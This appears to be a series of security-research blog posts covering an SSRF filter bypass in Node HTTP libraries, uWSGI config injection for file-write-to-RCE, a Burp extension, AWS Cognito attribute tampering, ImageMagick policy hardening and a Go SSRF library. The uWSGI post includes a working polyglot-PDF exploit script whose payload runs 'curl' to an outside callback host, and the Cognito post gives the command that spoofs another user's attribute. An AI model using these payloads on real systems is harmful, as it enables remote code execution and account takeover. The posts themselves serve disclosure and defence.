01/18/2023 - Another attempt to contact the maintainer
03/08/2023 - A Github issue creation, without the technical details
03/13/2023 - CVE-2023-28155 assigned
03/16/2023 - Full technical details disclosure

Other Libraries

Since supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) clients, it is natural to ask how other popular libraries handle these cases.

Node-Fetch

The node-Fetch library also allows to overwrite an HTTP(S) agent within its options, without specifying the protocol:

const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log('${error.toString().split('\n')[0]}');
});

Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:

$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"

It is therefore impossible to perform a similar attack on this library.

Axios

The axios library’s options allow to overwrite agents for both protocols separately. Therefore the following code is protected:

axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})

Note: In Axios library, it is neccesary to hardcode the urls during the agent overwrite. Otherwise, one of the agents would be overwritten with an agent for a wrong protocol and the cross-protocol redirect would fail similarly to the node-fetch library.

Still, axios calls can be vulnerable. If one forgets to overwrite both agents, the cross-protocol redirect can bypass the filter:

axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})

Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:

rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
        - pattern-either:
            - pattern: |
                {..., httpsAgent:..., ...}
            - pattern: |
                {..., httpAgent:..., ...}
        - pattern-not: |
                {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING

Summary

As discussed above, we have discovered an exploitable SSRF vulnerability in the popular request library. Despite the fact that this package has been deprecated, this dependency is still used by over 50k projects with over 18M downloads per week.

We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS). While many libraries we reviewed did provide protection from such attacks, others such as axios could be potentially vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.

A New Vector For “Dirty” Arbitrary File Write to RCE

2023-02-28T00:00:00+01:00

Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:

Control of the full file path or of the file name only: In this scenario, the attacker has the ability to control the full file path or the name of the uploaded file, but not its contents. Depending on the permissions applied to the target directory and on the target application, the impact may vary from Denial of Service to interfering with the application logic to bypass potential security-sensitive features.
Control of the file contents only: an attacker has control over the contents of the uploaded file but not over the file path. The impact can vary greatly in this case, due to numerous factors.
Full Arbitrary File Write: an attacker has control over both of the above. This often results in RCE using various methods.

A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):

Overwriting or adding files that will be processed by the application server:
- Configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
- Source files being served from the root of the application (e.g., .php, .asp, .jsp files)
- Temp files
- Secrets or environmental files (e.g., venv)
- Serialized session files
Manipulating procfs to execute arbitrary code
Overwriting or adding files used or invoked by the OS, or by other daemons in the system:
- Crontab routines
- Bash scripts
- .bashrc, .bash-profile and .profile
- authorized_keys and authorized_keys2 - to gain SSH access
- Abusing supervisors’ eager reloading of assets

It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.

The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.

An example of a “dirty” arbitrary file write

In our scenario, the application had a vulnerable endpoint, through which, an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for:

Reading an existing PDF template file and its stream
Combining the PDF template and the new attacker-provided contents
Saving the results in a PDF file named by the attacker

The attack was limited since it could only impact the files with the correct permissions for the application user, with all of the application files being read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:

    drwxrwxr-x  6 root   root     4096 Nov 18 13:48 .
    -rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini

uWSGI Lax Parsing of Configuration Files

The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128 . The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):

	while (len) {
		ini_line = ini_get_line(ini, len);
		if (ini_line == NULL) {
			break;
		}
		lines++;

		// skip empty line
		key = ini_lstrip(ini);
		ini_rstrip(key);
		if (key[0] != 0) {
			if (key[0] == '[') {
				section = key + 1;
				section[strlen(section) - 1] = 0;
			}
			else if (key[0] == ';' || key[0] == '#') {
				// this is a comment
			}
			else {
				// val is always valid, but (obviously) can be ignored
				val = ini_get_key(key);

				if (!strcmp(section, section_asked)) {
					got_section = 1;
					ini_rstrip(key);
					val = ini_lstrip(val);
					ini_rstrip(val);
					add_exported_option((char *) key, val, 0);
				}
			}
		}

		len -= (ini_line - ini);
		ini += (ini_line - ini);

	}

More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:

    [uwsgi]
    ; read from a symbol
    foo = @(sym://uwsgi_funny_function)
    ; read from binary appended data
    bar = @(data://0)
    ; read from http
    test = @(http://doyensec.com/hello)
    ; read from a file descriptor
    content = @(fd://3)
    ; read from a process stdout
    body = @(exec://whoami)
    ; call a function returning a char *
    characters = @(call://uwsgi_func)

uWSGI Auto Reload Configuration

While abusing the above .ini files is a good vector, an attacker would still need a way to reload it (such as triggering a restart of the service via a second DoS bug or waiting the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:

    [uwsgi]
    home = /app
    uid = webapp
    gid = webapp
    chdir = /app/console
    socket = 127.0.0.1:8001
    wsgi-file = /app/console/uwsgi-sockets.py
    gevent = 500
    logto = /var/log/uwsgi/%n.log
    harakiri = 30
    vacuum = True
    py-auto-reload = 3
    callable = app
    pidfile = /var/run/uwsgi-sockets-console.pid
    log-maxsize = 100000000
    log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak

In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.

Putting it all together

In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-lined .ini configuration file. The .ini payload had to be kept during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:

    from fpdf import FPDF
    from exiftool import ExifToolHelper

    with ExifToolHelper() as et:
        et.set_tags(
            ["doyensec.jpg"],
            tags={"model": "&#x0a;[uwsgi]&#x0a;foo = @(exec://curl http://collaborator-unique-host.oastify.com)&#x0a;"},
            params=["-E", "-overwrite_original"]
        )

    class MyFPDF(FPDF):
        pass

    pdf = MyFPDF()

    pdf.add_page()
    pdf.image('./doyensec.jpg')
    pdf.output('payload.pdf', 'F')

This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:

    uwsgi --ini payload.pdf

Let’s exploit it on the web server with the following steps:

Upload payload.pdf into /app/console/uwsgi-sockets.ini
Wait for server to restart or force the uWSGI reload by overwriting any .py
Verify the callback made by curl on Burp collaborator

Conclusions

As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.

Introducing Proxy Enriched Sequence Diagrams (PESD)

2023-02-14T00:00:00+01:00

PESD Exporter is now public!

We are releasing an internal tool to speed-up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on Github.

Modern web platforms design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.

We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).

Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.

Meet The Format

A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.

While classic sequence diagrams for software engineering are meant for an abstract visualization and all the information is carried by the diagram itself. PESD is designed to include granular information related to the underlying HTTP traffic being represented in the form of metadata.

The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.

As an example, URL query parameters will be found in the arrow events as UrlParams expandable with a click.

Some key characteristics of the format :

visual-analysis, especially useful for complex application flows in multi-actor scenarios where the listed proxy-view is not suited to visualize the abstract logic
tester-specific syntax to facilitate the analysis and overall readability
parsed metadata from the web traffic to enable further automation of the analysis
usable for reporting purposes like documentation of current implementations or Proof Of Concept diagrams

PESD Exporter - Burp Suite Extension

The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.

Once loaded, sending items to the extension will directly result in a export with all the active settings.

Currently, two modes of operation are supported:

Domains as Actors - Each domain involved in the traffic is represented as an actor in the diagram. Suitable for multi-domain flows analysis

Endpoints as Actors - Each endpoint (path) involved in the traffic is represented as an actor in the diagram. Suitable for single-domain flows analysis

Export Capabilities

Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover
Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N> / <VAR_N>. The re-renderization will reshape the diagram to improve flow readability. Every occurrence with the same value maintains the same name
Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports
Save as :
- Sequence Diagram in SVG format
- Markdown file (MermaidJS syntax),
- Traffic metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”

Your browser does not support the video tag.

Extending the diagram, syntax and metadata with Templates

PESD Exporter supports syntax and metadata extension via templates execution. Currently supported templates are:

OAuth2 / OpenID Connect The template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame
SAML SSO The template matches Single-Sign-On flows with SAML V2.0 and adds related flags + flow frame

Template matching example for SAML SP-initiated SSO with redirect POST:

The template engine is also ensuring consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS renderization.

Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.

Do you want to contribute by writing you own templates? Follow the template implementation guide.

Why PESD?

During Test Planning and Auditing

PESD exports allow visualizing the entirety of complex functionalities while still being able to access the core parts of its underlying logic. The role of each actor can be easily derived and used to build a test plan before diving in Burp Suite.

It can also be used to spot the differences with standard frameworks thanks to the HTTP messages syntax along with OAuth2/OpenID and SAML SSO templates.

In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.

The following detailed examples are extracted from our testing activities:

SAML Response Double Spending. The SAML Response was sent two times and one of the submissions happened out of the flow frame

OIDC with subsequent OAuth2. In this case, CLIENT.com was the SP in the first flow with Microsoft (OIDC), then it was the IdP in the second flow (OAuth2) with the tenant subdomain.

During Reporting

The major benefit from the research output was the conjunction of the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports allows to describe the issue in a straightforward way.

The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:

Black Box Testing - The description can refer to the interested sequence numbers in the flow along with the observed behavior and flaws;
White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.

In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.

The following basic example is extracted from one of our client engagements.

Report Example - Arbitrary User Access Via Unauthenticated Internal API Endpoint

An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web facing platform.

In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.

The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:

The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.

The second request (3) pointed to the AWS’s API Gateway. The endpoint was handled with an AWS Lambda function taking as input the URL parameters containing : tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.

In the third request (5), the authentication details obtained are submitted to the web-facing.platform.com and the session is set. After this step, the internal admin user is authenticated in the web-facing platform as the specified target user.

Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).

As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web facing platform. By doing so, the need of a valid super-admin access to the internal application (authentication) and a specific target-user access grant (authorization) were bypassed.

Stay tuned!

Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.

Feel free to contribute with pull requests, bug reports or enhancements.

This project was made with love in the Doyensec Research island by Francesco Lacerenza . The extension was developed during his internship with 50% research time.

Tampering User Attributes In AWS Cognito User Pools

2023-01-24T00:00:00+01:00

From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?

Solution

The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});

The server will return something like:

"data-internal-private-20220705153355922300000001"

So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offer a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both the cases, the end-user should receive the resulting JSON Web Token.

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their account in a third-party platform X_platform strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their data in X_platform for later use.

{
  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"
}

In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.

The permitted API definitions can be found here.

If the request syntax for the API call includes the parameter "AccessToken": "string", then it allows users to modify something on their own UserPool entry with the previously inspected JWT.

The above described design does not represent a vulnerability on its own, but having users able to edit their own User Attributes in the pool could lead to severe impacts if the backend is using them to apply internal platform logic.

The user associated data within the pool was fetched by using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1--access-token eyJra..[REDACTED SESSION JWT]

{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

Which User Attributes are associated with the user pool?
Which ones are editable with the JWT directly via AWS CLI?
- Among the editable ones, is the platform trusting such claims?
  - For what internal logic or functional flow?
  - How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within App Integration for the used Users Pool (AWS Cognito).

By removing it, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]
}

The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please ensure to properly handle the email and phone number verification in Cognito context. Since they may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate parameter.

Hands-On IaC Lab

Stay tuned for the next episode!

Resources

ImageMagick Security Policy Evaluator

2023-01-10T00:00:00+01:00

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo cultured from around the internet. This normally happens for two reasons:

Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy is regulating. While the architectural complexity and the granularity of options definable by the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by the developers depending on their use. According to the docs, “this affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure strict policy is also made available, however as noted in the past not always is well configured.
ImageMagick supports over 100 major file formats (not including sub-formats) types of image formats. The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and write a tool to assist both the developers and the security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, this is usually a manual task, which may not identify subtle bypasses which undermine the strength of a policy. It’s also easy to set policies that appear to work, but offer no real security benefit. The tool’s checks are based on our research aimed at helping developers to harden their policies and improve the security of their applications, to make sure policies provide a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  ...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />
  ...

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser changed behavior from disallowing the use of a coder if there was at least one none-permission rule in the policy to respecting the last matching rule in the policy for the coder. This means that it is possible to adopt an allowlist approach in modern policies, first denying all coders rights and enabling the vetted ones. A more secure policy would specify:

  ...
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />
  ...

Case sensitivity

Consider the following directive:

  ...
  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />
  ...

With this, conversions will still be allowed, since policy patterns are case sensitive. Coders and modules must always be upper-case in the policy (e.g. “EPS” not “eps”).

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads it’s convenient to search “oom” or similar keywords in the recently opened issues reported on the Github repository of the library. This is an issue since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be prone to be exploited. Because of this, the tool also reports if reasonable limits are not explicitly set by the policy.

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/etc/ImageMagick-6/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/share/doc/ImageMagick-6/www/source/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/share/doc/ImageMagick-7/www/source/policy.xml

# Example output on Ubuntu
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/share/doc/ImageMagick-7/www/source/policy.xml
/opt/ImageMagick-7.0.11-5/config/policy.xml
/opt/ImageMagick-7.0.11-5/www/source/policy.xml

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap xmlns="">
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy xmlns="" domain="system" name="precision" value="6"/>
</policymap>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml
...

You can also play with the above policy using our evaluator tool while developing a tailored one.

safeurl for Go

2022-12-13T00:00:00+01:00

Do you need a Go HTTP library to protect your applications from SSRF attacks? If so, try safeurl. It’s a one-line drop-in replacement for Go’s net/http client.

No More SSRF in Go Web Apps

When building a web application, it is not uncommon to issue HTTP requests to internal microservices or even external third-party services. Whenever a URL is provided by the user, it is important to ensure that Server-Side Request Forgery (SSRF) vulnerabilities are properly mitigated. As eloquently described in PortSwigger’s Web Security Academy pages, SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

While libraries mitigating SSRF in numerous programming languages exist, Go didn’t have an easy to use solution. Until now!

safeurl for Go is a library with built-in SSRF and DNS rebinding protection that can easily replace Go’s default net/http client. All the heavy work of parsing, validating and issuing requests is done by the library. The library works out-of-the-box with minimal configuration, while providing developers the customizations and filtering options they might need. Instead of fighting to solve application security problems, developers should be free to focus on delivering quality features to their customers.

This library was inspired by SafeCURL and SafeURL, respectively by Jack Whitton and Include Security. Since no SafeURL for Go existed, Doyensec made it available for the community.

What Does `safeurl` Offer?

With minimal configuration, the library prevents unauthorized requests to internal, private or reserved IP addresses. All HTTP connections are validated against an allowlist and a blocklist. By default, the library blocks all traffic to private or reserved IP addresses, as defined by RFC1918. This behavior can be updated via the safeurl’s client configuration. The library will give precedence to allowed items, be it a hostname, an IP address or a port. In general, allowlisting is the recommended way of building secure systems. In fact, it’s easier (and safer) to explicitly set allowed destinations, as opposed to having to deal with updating a blocklist in today’s ever-expanding threat landscape.

Installation

Include the safeurl module in your Go program by simply adding github.com/doyensec/safeurl to your project’s go.mod file.

